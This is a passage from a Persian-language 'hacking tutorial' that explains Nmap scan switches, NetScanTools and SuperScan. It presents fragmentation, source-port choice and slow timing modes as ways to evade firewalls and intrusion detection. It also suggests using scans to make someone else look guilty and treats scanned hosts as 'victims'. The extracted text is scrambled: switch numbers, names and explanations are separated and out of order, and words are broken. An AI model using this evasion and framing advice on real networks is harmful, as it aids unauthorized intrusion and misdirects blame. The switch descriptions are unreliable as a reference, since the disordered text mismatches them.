اﺽﺎﻓﻪ ﮐﻨﻢ ﮐﻪ ﮔﺰارش ﺡﺎﺻﻞ از ﻋﻤﻠﻴﺎت ﺏﻪ دﺱﺖ ﺷﻤﺎ ﻧﻤﯽ رﺱﺪ ،ﮐﻪ ﺏﺎیﺪ یﮏ ﮐﻤﯽ ﻣﺦ ﺏﮕﺰاریﺪ ایﻦ وﺱﻂ ﺕﺎ ﺟﻮاب ﭘﻮیﺶ را ﺏﺪﺱﺖ ﺏﯽ ﺁوریﺪ.اﮔﺮ از ایﻦ ﻣﺦ هﺎ ﻧﺪاریﺪ ﻣﻴﺘﻮاﻧﻴﺪ ایﻦ ﮐﺎر را اﻧﺠﺎم دهﻴﺪ ﺕﺎ ﺷﺨﺺ دیﮕﺮی را ﮔﻨﺎﻩ ﮐﺎر ﺟﻠﻮﻩ دهﻴﺪ!! ﻋﺠﺐ ﺁدم ﭘﺴﺖ ﻣﻴﺸﻮد ﮔﺎهﯽ .
ﻗﺴﻤﺖ Scanﺏﺨﺶ Scan Options
١١
-sW
Window Scan
ﺻﻔﺤﻪ
٣٣
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢١
} { –PT –PI
TCP + ICMP
٢٢ ٢٣
-PI -P0
ICMP Ping Don’t Ping
٢۴
-f
Fragmentation
٢۵
-I
Get Idented Info
٢۶
-R
Resolve All
٢٧
-n
Do not Resolve
٢٨ ٢٩
-F -O
Fast Scan OS Detection
٣٠
-iR
Random Host
٣١
--resume
Resume
ایﻦ ﺱﻮیﭻ ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ یﮑﯽ از ﻣﮑﺎﻧﻴﺰﻣﻬﺎی ﭘﻨﻬﺎﻧﯽ ﺧﻮد ) ﺷﻤﺎرﻩ هﺎی ٢یﺎ ٣یﺎ ۶یﺎ ( ٧ﺟﻬﺖ ﭘﻮیﺶ اﺱﺘﻔﺎدﻩ ﮐﻨﺪ .اﻟﺒﺘﻪ هﺮ ﮐﺪام از ایﻦ ۴ﻣﮑﺎﻧﻴﺰم درون ﭘﺮاﻧﺘﺰ را ﺏﻪ ﺻﻮرت ﺏﺴﺘﻪ هﺎی IPﻣﻨﻔﺼﻞ ﺏﻪ هﻤﺮاﻩ " هﺪر " TCP ،ﺕﮑﻪ ﺕﮑﻪ ﺷﺪﻩ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﺪهﺪ .ایﻦ ﮐﺎر ﺏﺮای ﭘﻴﺸﮕﻴﺮی از ﺏﻠﻮﮐﻪ ﺷﺪن ﺏﺴﺘﻪ هﺎی ﻣﻮرد ﻧﻈﺮ ﺕﻮﺱﻂ دیﻮار اﺕﺶ و یﺎ ﺁﻗﺎ دزد ﮔﻴﺮ )ﺱﻴﺴﺘﻤﻬﺎی ﮐﺸﻒ ﺕﻬﺎﺟﻢ (IDSاﻧﺠﺎم ﻣﻴﺸﻮد. اﮔﺮ از ﻣﮑﺎﻧﻴﺰم –sTاﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ یﮏ ﺱﺮی اﻃﻼﻋﺎت اﺽﺎﻓﯽ هﻢ ﺏﺮای ﺷﻤﺎ ﺟﻤﻊ ﺁوری ﻣﻴﮑﻨﺪ ﮐﻪ اﻟﺒﺘﻪ ﻋﺎﻟﯽ ﻧﻴﺰ هﺴﺘﻨﺪ. در ﻣﻮﻗﻌﯽ ﮐﻪ یﮏ رﻧﺞ IPرا ﺏﺮای ﭘﻮیﺶ ﺏﻪ ﺁن ﻣﻴﺪهﻴﺪ ﺏﻪ ﻃﻮر ﭘﻴﺶ ﻓﺮض روی IPهﺎی ﮐﻪ ﺟﻮاب ﻣﻴﺪهﻨﺪ دﻧﺒﺎل DNSﺁن هﺎ ﻣﻴﮕﺮدد اﮔﺮ ایﻦ را اﻧﺘﺨﺎب ﮐﻨﻴﺪ روی IPهﺎی هﻢ ﮐﻪ ﺟﻮاب ﻧﻤﯽ دهﻨﺪ هﻢ ایﻦ ﮐﺎر را اﻧﺠﺎم ﻣﻴﺪهﺪ !! ﺧﻮب ایﻦ اﻣﮑﺎن ﭘﻴﺶ ﻓﺮض ﺏﺎﻻی را از ﮐﺎر ﻣﻴﺎﻧﺪازد یﻌﻨﯽ روی IPهﻢ ﮐﻪ ﺟﻮاب ﻣﻴﺪهﻨﺪ دﻧﺒﺎل اﺱﻢ DNS هﻢ ﻧﻤﻴﮕﺮدد. ایﻦ ﮔﺰیﻨﻪ ﻓﻘﻂ ﭘﻮرت هﺎی ﻣﺸﻬﻮر را اﺱﮑﻦ ﻣﻴﮑﻨﺪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ روی ﻣﺎﺷﻴﻦ هﺪف را ﮐﺸﻒ ﮐﻨﺪ. اﻣﮑﺎن اﻧﺘﺨﺎب ﺕﺼﺎدﻓﯽ ﻣﻴﺰﺏﺎن هﺎی ﻣﻮرد ﻧﻈﺮ را از ﻟﻴﺴﺘﯽ ﮐﻪ ﺷﺎﻣﻞ ایﻦ اﺱﺎﻣﯽ اﺱﺖ ﮐﻪ ﺷﻤﺎ ﺏﻪ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺪهﻴﺪ را دارا ﻣﻴﺒﺎﺷﺪ !! در ﺻﻮرت ﻟﻐﻮ ﻋﻤﻠﻴﺎت ﭘﻮیﺶ ) ﺏﺎ اﺱﺘﻔﺎدﻩ از (CTRL-Cاﮔﺮ ایﻦ را ﻓﻌﺎل ﮐﺮدﻩ ﺏﺎﺷﻴﺪ ﺏﺎ ﺕﻌﻴﻴﻦ ﻧﺎم ﻓﺎیﻞ ﻣﻮرد ﻧﻈﺮ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺘﺎیﺞ را ﻣﺸﺎهﺪﻩ ﮐﻨﻴﺪ.
ﻗﺴﻤﺖ و ﺏﺨﺶ Discover
٢٠
-PT
TCP Ping
ایﻦ ﮔﺰیﻨﻪ Nmapرا وادار ﻣﻴﮑﻨﺪ از ﺷﻴﻮﻩ ای ﺏﻪ ﻋﻨﻮان TCP Pingﺏﺮای ﻋﻤﻞ pingاﺱﺘﻔﺎدﻩ ﮐﻨﺪ .ایﻦ ﺷﻴﻮﻩ ﮐﺎﻣﻼ ﻣﺸﺎﺏﻪ ﻋﻤﻞ Telnetاﺱﺖ و ﭘﻮرت ﭘﻴﺶ ﻓﺮض هﻢ ٨٠اﺱﺖ .در ﺻﻮرت ایﻨﮑﻪ ﭘﻮرت ﻣﻮرد ﻧﻈﺮ را ﺏﺨﻮاهﻴﺪ ﺕﻐﻴﻴﺮ دهﻴﺪ ﺏﺎیﺪ ﺷﻤﺎرﻩ ﺁن را ﺏﻌﺪ از ﺱﻮیﭻ وارد ﮐﻨﻴﺪ. ﺱﻮیﭻ ﻣﺸﺎﺏﻪ ﺁن در ﻟﻴﻨﻮﮐﺲ هﺎ –PBاﺱﺖ ﮐﻪ از هﺮ دو ﺷﻴﻮﻩ هﻤﺮاﻩ هﻢ اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ. در ایﻦ ﺷﻴﻮﻩ از ﭘﻴﻐﺎم ICMPاﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد. ﺏﺎ اﻧﺘﺨﺎب اﺏﻦ ﮔﺰیﻨﻪ از اﻧﺠﺎم ﻋﻤﻞ Pingﺧﻮد داری ﻣﻴﮑﻨﺪ در ﻧﺘﻴﺠﻪ ﺏﺮﻧﺎﻣﻪ ﺏﺪون داﻧﺴﺘﻦ ایﻨﮑﻪ اﺻﻞ ﺁن IP ﺏﺎﻻ هﺴﺖ یﺎ ﻧﻪ ایﻦ ﮐﺎر) ﭘﻮیﺶ ﭘﻮرت( را اﻧﺠﺎم ﻣﻴﺪهﺪ.
ﻗﺴﻤﺖ و ﺏﺨﺶ Option
١٩
}-g {x
Source Port
ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ اﻣﮑﺎن ﺕﻌﻴﻴﻦ ﭘﻮرت ﻣﻨﺒﻌﯽ ﮐﻪ ﮐﻠﻴﻪ ﻋﻤﻠﻴﺎت اﺱﮑﻦ ﺕﻮﺱﻂ ایﻦ ﺏﺮﻧﺎﻣﻪ از ﺁن ﺟﺎ اﻧﺠﺎم ﻣﻴﺸﻮد ،در اﺧﺘﻴﺎر ﻗﺮار ﻣﻴﮕﻴﺮد .ﺏﻨﺎﺏﺮایﻦ ذﮐﺮ ﺷﻤﺎرﻩ ﭘﻮرت ﻣﺰﺏﻮر ﺏﻌﺪ از ایﻦ ﮔﺰیﻨﻪ اﻟﺰاﻣﯽ اﺱﺖ ).در ﺏﺮﺧﯽ ﻣﻮارد ﮐﻪ دیﻮار ﺁﺕﺶ ﻣﮕﺲ ﮐﺎر ﻣﻴﺸﻮد و ﻋﻤﻠﻴﺎت ﻣﺎ را هﯽ ﻧﺎﮐﺎم ﻣﯽ ﮔﺰارد ایﻦ ﮔﺰیﻨﻪ ﻓﻮق اﻟﻌﺎدﻩ اﺱﺖ و ﺕﻌﻴﻴﻦ یﮑﯽ از ﭘﻮرت هﺎ ﻣﻌﺮوف ﻣﺜﻞ ٨٠و ٢٠و " " UDP ۵٣ﺁن راﻩ ﮔﺸﺎ اﺱﺖ (
٣٤
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
۴٢
}--max_rtt_timeout {X
۴٣
}--max_parallelism {X
۴۵
}--min_rtt_timeout {X
۴۶
}--initial_rtt_timeout {X
۴٧
}--scan_delay {X
۴٨
"ﻣﺴﻴﺮ ﻓﺎیﻞ" -iL
۴٩
"ﻣﺴﻴﺮ ﻓﺎیﻞ" -oN
۵٠
--win_nopcap
No Pcap
۵١
--win_trace
winTrace
۵٢
--win_noiphlpapi
No IP Hlp Api
۵٣
--win_norawsock
No Raw Sockets
۵۴
--win_forcerawsock
Force Raw Socket
۵۵
--win_nt4route
NT4 Route
از ﺕﻮاﺏﻊ Pcapدیﮕﺮ اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﺪ !!! ﺏﻪ ﺟﺎی ﺁن از ﺕﻮاﺏﻊ Socket Rawاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ. ﺧﻮب اﮔﺮ ﺷﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﻗﺮﺏﺎﻧﯽ از ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ﻣﺎیﮑﺮوﺱﺎﻓﺖ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ﺏﺎ اﻧﺘﺨﺎب ایﻦ ﮔﺰیﻨﻪ یﮏ ﮐﻤﯽ اﻃﻼﻋﺎت ﺏﻴﺸﺘﺮی ﺏﺮای ﺷﻤﺎ دﺱﺖ ﭘﺎ ﻣﻴﮑﻨﺪ. ﻣﺜﻞ ﮔﺰیﻨﻪ ﺏﺎﻻ اﺱﺖ وﻟﯽ ﺏﺮای هﺮ ﺏﺴﺘﻪ ﻓﻘﻂ ١۵ﺙﺎﻧﻴﻪ ﺏﻴﺸﺘﺮ ﻣﻨﺘﻈﺮ ﺟﻮاب ﻧﻤﻴﺸﻮد. ﺏﺎ اﻧﺘﺨﺎب ایﻦ ﮔﺰیﻨﻪ ﺕﻮاﺏﻊ Raw Socketsهﻢ اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﺷﻮد. ﺧﻮب ایﻦ ﮔﺰیﻨﻪ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﻓﻘﻂ ﺕﻮاﺏﻊ Raw Socketاﺱﺘﻔﺎدﻩ ﺷﻮد. ﺁزﻣﺎیﺶ ﻣﻴﮑﻨﺪ ﮐﺪ هﺎی ﻣﺴﻴﺮ یﺎب NT4را.هﻤﻴﻦ!!
ﻗﺴﻤﺖ Option ﺏﺨﺶ Debug
٣٩ ۴٠ ۴١
-T 4 -T 5 }--host_timeout –{X
ﻗﺴﻤﺖ Timingﺏﺨﺶ Throttle
٣۶ ٣٧ ٣٨
-T 1 -T 2 -T 3
Throttle Paranoidﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم ایﻦ ۶را ،وﻟﯽ ﺏﺎزم ﻣﻴﮕﻢ.هﺮ ﭘﻨﺞ ۵ دﻗﻴﻘﻪ یﮏ ﺏﺴﺘﻪ ارﺱﺎل ﻣﻴﺸﻮد. هﺮ ﭘﺎﻧﺰدﻩ ١۵ﺙﺎﻧﻴﻪ یﮏ ﺏﺴﺘﻪ ﻣﯽ ﻓﺮﺱﺘﺪ. Throttle Sneaky هﺮ ٠٫۴یﮏ ﺏﺴﺘﻪ ﻣﻴﻔﺮﺱﺘﺪ. Throttle Polite ارﺱﺎل ﺏﺎ ﺡﺪاﮐﺜﺮ ﺱﺮﻋﺖ ﻣﻤﮑﻦ ،ﺏﮕﻮ ﻧﻪ ای ﮐﻪ هﻴﭻ Throttle Normal ﭘﻮرت ﺁزﻣﺎیﺶ ﻧﺸﺪﻩ ای ﺏﺎﻗﯽ ﻧﻤﺎﻧﺪ. Throttle Aggressiveﺏﺮای دریﺎﻓﺖ ﭘﺎﺱﺦ ١٫٢۵ﺙﺎﻧﻴﻪ ﺏﻴﺸﺘﺮ ﻣﻨﺘﻈﺮ ﻧﻤﻴﺸﻮد. ﺏﺮای دریﺎﻓﺖ ﭘﺎﺱﺦ ٠٫٣ﺙﺎﻧﻴﻪ ﻣﻨﺘﻈﺮ ﻣﻴﺸﻮد. Throttle Insane ایﻦ ﺱﻮیﭻ ﺡﺪاﮐﺜﺮ زﻣﺎن ﻗﺎﺏﻞ ﺻﺮف ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ Host Timeout ﺙﺎﻧﻴﻪ را ﺟﻬﺖ اﺱﮑﻦ ﭘﻮرت هﺎی یﮏ ﻣﻴﺰﺏﺎن ﺧﺎص ﺕﻌﻴﻴﻦ ﻣﻴﮑﻨﺪ. ایﻦ ﺱﻮیﭻ ﺡﺪاﮐﺜﺮ ﻣﺪت زﻣﺎن اﻧﺘﻈﺎر ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ Max RTT ﺙﺎﻧﻴﻪ را ﺟﻬﺖ دریﺎﻓﺖ ﭘﺎﺱﺦ ﻻزم از ﻣﻴﺰﺏﺎن ﻣﻮرد ﻧﻈﺮ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻨﺪ. ایﻦ ﺱﻮیﭻ ﺕﻌﺪاد ﭘﻮرت هﺎیﯽ را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ ﮐﻪ ﺏﻪ Parallelism ﻃﻮر ﻣﻮازی ) یﺎ هﻢ زﻣﺎن ﺏﻪ ﻋﺒﺎرت دیﮕﺮ ( ﻣﻴﺘﻮان ﭘﻮیﺶ ﻧﻤﻮد. ایﻦ ﺱﻮیﭻ ﺡﺪاﻗﻞ ﻣﺪت زﻣﺎن اﻧﺘﻈﺎر ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ Min RTT ﺙﺎﻧﻴﻪ را ﺟﻬﺖ دریﺎﻓﺖ ﭘﺎﺱﺦ ﻻزم از ﻣﻴﺰﺏﺎن ﻣﻮرد ﻧﻈﺮ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻨﺪ. ایﻦ ﺱﻮیﭻ ﻣﺪت زﻣﺎن ﭘﻴﺶ ﻓﺮض ﺏﺮای ایﻦ اﻧﺘﻈﺎرهﺎ Initial RTT را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ .زﻣﺎن ﭘﻴﺶ ﻓﺮض ۶ﺙﺎﻧﻴﻪ اﺱﺖ. ایﻦ ﺱﻮیﭻ ﻓﺎﺻﻠﻪ زﻣﺎﻧﯽ ﻣﻮرد ﻧﻴﺎز ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ Scan Delay ﺏﻪ ﻋﻨﻮان ﺕﺎﺧﻴﺮ ﻣﻴﺎن اﺱﮑﻦ دو ﻣﻴﺰﺏﺎن ﻣﺨﺘﻠﻒ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. ایﻦ ﮔﺰیﻨﻪ ﺏﺎ وارد ﮐﺮدن ﻓﺎیﻞ هﺎی ﺏﺎ ﻗﺎﻟﺐ ﻣﺨﺼﻮص Input File ﻣﻴﺘﻮاﻧﻴﺪ ﮐﺎر را اداﻣﻪ دهﻴﺪ و***. .. ایﻦ ﮔﺰیﻨﻪ ﻣﻮﺟﺐ ﺙﺒﺖ ﺕﻤﺎﻣﯽ ﺧﺮوﺟﯽ هﺎی ﺡﺎﺻﻞ از Output File ﺏﺮﻧﺎﻣﻪ در ﻗﺎﻟﺒﯽ ﮐﻪ ﺷﻤﺎ ﺏﺘﻮاﻧﻴﺪ ﻣﺸﺎهﺪﻩ ﮐﻨﻴﺪ ﻣﻴﺸﻮد**.
ﻗﺴﻤﺖ Timingﺏﺨﺶ Time Out
٣۵
-T 0
ﭘﻴﺸﺮﻓﺖ ﻋﻤﻞ ﭘﻮیﺶ ﺏﺎ ﺕﻤﺎم ﺟﺰیﻴﺎت را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ.
ﻗﺴﻤﺖFile
٣۴
-vv
Very Verbose
ﺡﺎﻟﺖ اﺷﮑﺎل زدایﯽ را ﻓﻌﺎل ﻣﯽ ﮐﻨﺪ . ﭘﻴﺸﺮﻓﺖ ﻋﻤﻞ ﭘﻮیﺶ ﺏﺎ ﺟﺰیﻴﺎت را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ.
ﻗﺴﻤﺖ Win 32ﺏﺨﺶ ) Optionsزیﺎد ﻣﻬﻢ ﻧﻴﺴﺖ(
٣٢ ٣٣
-d -v
Debug Verbose
ﺻﻔﺤﻪ
٣٥
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣٦
اﻟﮕﻮی ﻋﻤﻮﻣﯽ دﺱﺘﻮرات و ﺱﻮیﭻ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرت زیﺮ ﻣﻴﺒﺎﺷﺪ: >nmap [Scan Type(s)] [Options]
ﺧﻮب ﺡﺎﻻ دیﺪیﺪ ﭼﺮا ﮔﻔﺘﻢ ایﻦ ﺏﺮﻧﺎﻣﻪ یﮏ یﮏ اﺱﺖ ﺏﺎ ایﻦ هﻤﻪ ﻣﮑﺎﻧﻴﺰم ﺧﻮب ﻣﻌﻠﻮﻣﻪ ﻧﻔﺲ ﮐﺶ ﻣﯽ ﻃﻠﺒﻪ !!! ﻼ ﺕﻮﺽﻴﺢ دادم ﺏﺮای ﺷﻤﺎ هﺎ وﻟﯽ ﻓﮑﺮ ﮐﻨﻢ هﻴﭻ ﮐﺴﯽ ﻗﺒﻞ از ﻣﻦ ایﻦ ﺟﻮری ایﻦ ﺏﺮﻧﺎﻣﻪ را ﺏ ﺎز ﻣﻦ ﺕﻤﺎم ﻣﮑﺎﻧﻴﺰم هﺎ و ﺱﻮیﭻ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ را ﮐﺎﻣ ً ﻧﮑﺮدﻩ ﺏﺎﺷﺪ!! وﻟﯽ ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺕﮏ ﺕﮏ ﺱﻮیﭻ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﮐﺎر ﺷﻤﺎ هﺎ ﺏﻴﺎیﺪ . ﺏﻘﻴﻪ ﮐﺎر ﺏﺎ ﺧﻮدﺕﺎن ﻣﻴﺮیﻢ ﺱﺮ اﺏﺰار ﺏﻌﺪی ﺏﻪ ﻧﺎم: ایﻦ ذﮐﺮ ﮐﻨﻢ ﮐﻪ ﺏﺮﻧﺎﻣﻪ Nmapیﮏ ﻧﺴﺨﻪ ﺏﺎ ﻧﺎم nmap-3.75-win32دارد ﮐﻪ هﻴﭻ ﻣﺸﮑﻠﯽ ﻧﺪارد و روی ﺕﻤﺎم ﻧﺴﺦ ویﻨﺪوز NTاز ﺟﻤﻠﻪ XP و ...ﺏﻪ ﺏﻬﺘﺮیﻦ ﺷﻴﻮﻩ ﻣﻤﮑﻦ ﮐﺎر ﻣﻴﮑﻨﺪ اﻟﺒﺘﻪ در ﺧﻂ ﻓﺮﻣﺎن ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ایﻦ ﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺕﺎ ﺏﺎ ﻣﻘﺎیﺴﻪ ﺟﻮاﺏﻬﺎ ﺏﻪ ﺡﺮف ﻣﻦ ﭘﯽ ﺏﺒﺮیﺪ. Net Scan Tools -٢ﮐﻪ ﺏﺎﻻ در ﺏﺎرﻩ ﮐﺎرهﺎش ﺕﻮﺽﻴﺢ دادم ایﻦ ﺟﺎ هﻢ یﮏ ﻣﺨﺘﺼﺮی ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ :
ﮐﻪ هﻤﺎﻧﻄﻮر ﮐﻪ در ﺷﮑﻞ ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ دارای اﻣﮑﺎن NetScannerاﺱﺖ ﮐﻪ دﻗﻴﻘﺎ ﻣﺸﺎﺏﻪ ﺱ ﻮیﭻ –sPدر ﻧ ﺮم اﻓ ﺰار Nmapاﺱ ﺖ. ﺏﺎ ایﻦ اﻣﮑﺎن ﻣﻴﺘﻮان ﻣﺤﺪودﻩ ای ﻣﺸﺨﺺ ) رﻧﺞ ( از IPهﺎ را ﺏﺮای ایﻨﮑﻪ ﺁیﺎ ﻓﻌﺎل هﺴﺘﻨﺪ یﺎ ﻧﻪ ﻣﻮرد ﺏﺮﺱﯽ ﻗﺮار داد. اﻣﮑﺎن دیﮕﺮ ایﻦ ﺏﺮﻧﺎﻣﻪ Port Scannerاﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﺏﺪ ﻧﻴﺴﺖ ﮐﻪ ﺷﻤﺎ ﺏﺎ وارد ﮐﺮدن IPیﺎ ﻣﺤﺪودﻩ ﺁن ﺏﻪ ﭘﻮیﺶ ﭘﻮرت ﻣﯽ ﭘﺮدازیﺪ .دیﮕ ﻪ هﻤ ﻴﻦ ﭼﻮن ﺧﻴﻠﯽ ﮐﺎر ﺏﺎ ﺁن ﺕﺎﺏﻠﻮ ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ . -٣اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻦ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﻟﺒﺘﻪ ﺧﻮدم هﻢ از ﺁن ﻣﺜﻞ اﺏﺰارهﺎی ﻗﺒﻠﯽ هﻢ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ Super Scanاﺱﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ :
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣٧
ایﻦ اﺏﺰار ﺏﺪی ﻧﻴﺴﺖ یﻌﻨﯽ اﺻﻼ ﻧﻤﻴﺸﻮد ﺏﻪ ﺁن ﮔﻔﺖ ﺏﺪ وﻟﯽ یﮏ زرﻩ ای ﺷﻠﻮغ و اﻟﺒﺘﻪ ﺏﯽ روال دﻗﻴﻘﺎ ﻣﺜﻞ ایﻦ ﻣﻘﺎﻟﻪ!! اﻟﺒﺘ ﻪ دارای اﻣﮑﺎﻧ ﺎت ﺧ ﻮﺏﯽ هﻢ اﺱﺖ .ایﻦ ﺏﺮﻧﺎﻣﻪ از ﻣﮑﺎﻧﻴﺰم دﺱﺖ ﺕﮑﺎﻧﯽ ٣ﺱﻪ ﻣﺮﺡﻠﻪ ای اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ .دارای یﮏ ﺱﺮی ﺏﺨﺶ اﺱﺖ ﮐﻪ ﺱﻌﯽ ﻣﻴﮑﻨﻢ هﻤﻪ را ﺕﻮﺽﻴﺢ ﺏﺪهﻢ: : Host name Lookup -١ﺧﻮب ﺕﺎﺏﻠﻮ ایﻨﺠﺎ ﺏﺎیﺪ اﺱﻢ یﺎ IPهﺪف ﺧﻮدﺕﺎن را وارد ﮐﻨﻴﺪ ﺕﺎ یﮏ ﺱﺮی اﻃﻼﻋﺎت درﺏﺎرﻩ ﺁن ﺏﺪﺱﺖ ﺁوریﺪ. -٢ﻗﺴﻤﺖ : Configurationﺧﻮب ﭘﻴﮑﺮ ﺏﻨﺪی را در ایﻨﺠﺎ ﺕﻨﻈﻴﻢ ﻣﻴﮑﻨﻴﻢ از ﺟﻤﻠﻪ ﻟﻴﺴﺖ ﭘﻮرت هﺎی را ﮐ ﻪ ﻣﻴﺨ ﻮاهﻴﻢ ﭘ ﻮیﺶ ﺏﮑﻨ ﻴﻢ ﮐ ﻪ ﺏ ﺮای ای ﻦ ﮐﺎر هﻢ ﻣﻴﺘﻮاﻧﻴﺪ ﺧﻮدﺕﺎن ﻟﻴ ﺴﺖ درﺱ ﺖ ﮐﻨﻴ ﺪ ه ﻢ ﻣﻴﺘﻮاﻧﻴ ﺪ از ﻟﻴ ﺴﺖ ه ﺎی ه ﻢ راﻩ ﺏﺮﻧﺎﻣ ﻪ اﺱ ﺘﻔﺎدﻩ ﮐﻨﻴ ﺪ ﺷ ﻤﺎ ه ﻢ ﻣﻴﺘﻮاﻧﻴ ﺪ ﻗ ﺴﻤﺖ Helper apps in right-click menuرا ﺏﺎ ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﻮرد ﻧﻈﺮ ﺧﻮد ﭘﺮ ﮐﻨﻴﺪ ﻣﺜﻼ ﺏﺮای ﮔﺰیﻨﻪ Telnetﻣﻴﺘﻮاﻧﻴﺪ از ﺏﺮﻧﺎﻣﻪ ای ﺏ ﻪ هﻤ ﻴﻦ ﻧ ﺎم در ویﻨ ﺪوز اﺱ ﺘﻔﺎدﻩ ﮐﻨﻴﺪ یﺎ ﻧﺮﻣﺎﻓﺰارهﺎی دیﮕﺮی هﻤﭽﻮن NCو ...ﮐﻪ وﻗﺘﯽ یﮏ ﭘﻮرت ﺏﺎز ﭘﻴﺪا ﮐﺮد ﺏﺮﻧﺎﻣﻪ ﺏﺎ یﮏ راﺱﺖ ﮐﻠﻴ ﮏ روی ﺁن ﺏﺘﻮاﻧﻴ ﺪ ﺏ ﺎ ﻧ ﺮم اﻓﺰاره ﺎی ﮐﻪ در ایﻦ ﺏﺨﺶ ﻣﺸﺨﺺ ﮐﺮدﻩ ایﺪ ﺏﻪ ان ﭘﻮرت وﺻﻞ ﺷﻮیﺪ و.. -٣ﻗﺴﻤﺖ IPدر ایﻦ ﻗﺴﻤﺖ ﻣﺤﺪودﻩ ای را ﮐﻪ ﺏﺎیﺪ ﭘﻮیﺶ ﺷﻮد را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﻢ . -۴ﻗﺴﻤﺖ Scanو Scan Typeدر ﺏﺨ ﺶ Scan Typeﻣﻴﺘ ﻮاﻧﻴﻢ ﭘﺎراﻣﺘﺮه ﺎی ﻣ ﻮرد ﻧﻈ ﺮ ﺧ ﻮد ﺟﻬ ﺖ ﮐﻨﺘ ﺮل ﭘ ﻮیﺶ را ﻣ ﺸﺨﺺ ﮐﻨ ﻴﻢ .ﮔﺰیﻨ ﻪ only Scan Responsive Pingﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ ﺏﺮﻧﺎﻣﻪ از IPهﺎی ﮐﻪ در ﺟﻮاب Pingﭘﺎﺱﺨﯽ از ﺧﻮد ﻧﺪادﻩ اﻧﺪ ) ﻓﻌﺎل ﻧﺒ ﻮدﻩ اﻧ ﺪ ( از ﭘ ﻮیﺶ ﭘﻮرت هﺎی ﺁﻧﻬﺎ ﺧﻮد داری ﮐﻨﺪ. ﮔﺰیﻨﻪ Host Responsive Showﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ ﭘﺲ از ﺏﺮﻗﺮاری اﺕ ﺼﺎل ﺏ ﺎ ﻣﻴﺰﺏ ﺎن و ﺕﺤﺮی ﮏ ﭘ ﻮرت ﻣ ﻮرد ﻧﻈ ﺮ ) ﺏ ﻪ ﻣﻨﻈ ﻮر ﺟﻤ ﻊ ﺁوری اﻃﻼﻋﺎت ﻻزم در ﺏﺎرﻩ ﺁن ( هﺮﮔﻮﻧﻪ اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺁوردﻩ از ﺁن را ﻧﻤﺎیﺶ ﺏﺪهﺪ. ﻗﺴﻤﺖ ﺁﺧﺮ ﮔﺰیﻨﻪ All Port Fromهﻢ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ وارد ﮐﺮد 